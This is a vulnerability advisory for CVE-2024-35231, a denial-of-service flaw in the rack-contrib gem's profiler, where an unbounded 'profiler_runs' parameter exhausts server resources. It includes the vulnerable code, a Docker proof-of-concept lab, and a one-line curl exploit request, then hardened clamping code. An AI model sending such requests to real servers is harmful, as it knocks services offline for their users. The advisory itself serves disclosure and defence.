CVE-2024-35231 – rack-contrib
Package
Manager: gem
Name: rack-contrib
Vulnerable Version: >=0 <2.5.0
Severity
Level: High
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H
EPSS: 0.00107 (percentile 0.29617)
Details
rack-contrib vulnerable to Denial of Service due to the unconstrained value of the incoming "profiler_runs" parameter

### Summary

The following Ruby code is vulnerable to denial of service because the user-controlled value `profiler_runs` is not constrained by any limit, so a single request can make the server allocate resources without bound (CWE-770).

```ruby
runs = (request.params['profiler_runs'] || @times).to_i
result = @profile.profile do
  runs.times { @app.call(env) }
end
```

A request such as `curl --fail "http://127.0.0.1:9292/?profiler_runs=9999999999&profile=process_time"` may cause resource exhaustion through a remotely controlled value.

### PoC

The `config.ru` file:

```ruby
require 'rack'
require 'rack/contrib'

use Rack::Profiler # if ENV['RACK_ENV'] == 'development'

# Define a Rack application
app = lambda do |env|
  # Your application logic goes here
  [200, {}, ["Hello World"]]
end

# Run the Rack application
run app
```

A Dockerfile:

```Dockerfile
# Use the official Ruby image as a base
FROM ruby:latest

# Set the working directory inside the container
WORKDIR /app

# Copy the custom config.ru file into the container
COPY config.ru .
COPY Gemfile .

# Install rack and the gems needed to run the app
RUN bundle install

# Expose the port that rackup will listen on
EXPOSE 9292

# Run rackup when the container starts
ENTRYPOINT ["rackup","--host","0.0.0.0","--port","9292"]

# Health check
HEALTHCHECK --interval=3s --timeout=10s --start-period=2s --retries=3 CMD curl --fail http://localhost:9292/ || exit 1
```

A Gemfile:

```ruby
source 'https://rubygems.org'
gem 'rack', '~> 2.0'
gem 'rack-contrib', '~> 2.4'
gem 'rackup'
gem 'ruby-prof'
```

A Docker Compose file (YAML, not a Dockerfile):

```yaml
services:
  app:
    build:
      context: .
    ports:
      - "9292:9292"
```

To run the PoC:

```bash
docker compose up --build
```

To exploit the DoS:

```bash
curl "http://127.0.0.1:9292/?profiler_runs=9999999999&profile=process_time"
```

### Impact

- Potential denial of service by remotely user-controlled data.
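As an added example (not rack-contrib's own code and not part of this advisory), the defensive pattern that closes the CWE-770 weakness described above: validate the `profiler_runs` value and clamp it to a ceiling before it drives repeated work. The `MAX_PROFILER_RUNS` ceiling, the `example.params` env key and the `BoundedProfiler` middleware are assumptions for illustration; a real deployment would read parameters through `Rack::Request` as the vulnerable code does. The block shows the vulnerable parse beside the hardened one so the difference in accepted values is visible.

```ruby
# Added example, not rack-contrib's code. Demonstrates bounding a
# user-controlled repetition count before it is used to drive work.

MAX_PROFILER_RUNS = 100   # assumed ceiling; pick one appropriate for the deployment
DEFAULT_RUNS = 1

# Vulnerable parse, as in the advisory: String#to_i accepts any size of
# integer, so a remote client chooses how many times the app is invoked.
def unbounded_runs(params, default = DEFAULT_RUNS)
  (params['profiler_runs'] || default).to_i
end

# Hardened parse: require a plain non-negative decimal integer, fall back to the
# default for missing, malformed or non-positive input, and clamp to a ceiling.
def bounded_runs(params, default: DEFAULT_RUNS, max: MAX_PROFILER_RUNS)
  raw = params['profiler_runs']
  return default if raw.nil? || raw.to_s.strip.empty?
  return default unless raw.to_s.match?(/\A\d+\z/)   # rejects "-5", "1e9", "10abc"
  n = raw.to_i
  n = default if n < 1
  [n, max].min
end

# Minimal Rack-style middleware (a callable taking an env Hash) showing where
# the bound belongs. It does not depend on the rack gem: the env is a plain
# Hash and 'example.params' is a constructed key standing in for Rack::Request#params.
class BoundedProfiler
  def initialize(app, max: MAX_PROFILER_RUNS)
    @app = app
    @max = max
  end

  def call(env)
    params = env.fetch('example.params', {})
    runs = bounded_runs(params, max: @max)
    runs.times { @app.call(env) }   # repeated work is now capped at @max
    [200, { 'content-type' => 'text/plain', 'x-profiler-runs' => runs.to_s },
     ["profiled #{runs} run(s)\n"]]
  end
end

if __FILE__ == $PROGRAM_NAME
  hostile = { 'profiler_runs' => '9999999999' }   # constructed attacker-style input
  puts "unbounded: #{unbounded_runs(hostile)}"
  puts "bounded:   #{bounded_runs(hostile)}"
end
```

The ceiling is enforced server-side regardless of what the client sends; logging requests where the clamp actually fires (raw value above `max`) is a cheap detection signal for probing of this parameter.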
Metadata
Created: 2024-05-28T15:48:43Z
Modified: 2024-05-31T20:42:29Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8c8q-2xw3-j869/GHSA-8c8q-2xw3-j869.json
CWE IDs: ["CWE-770"]
Alternative ID: GHSA-8c8q-2xw3-j869
Finding: F067
Auto approve: 1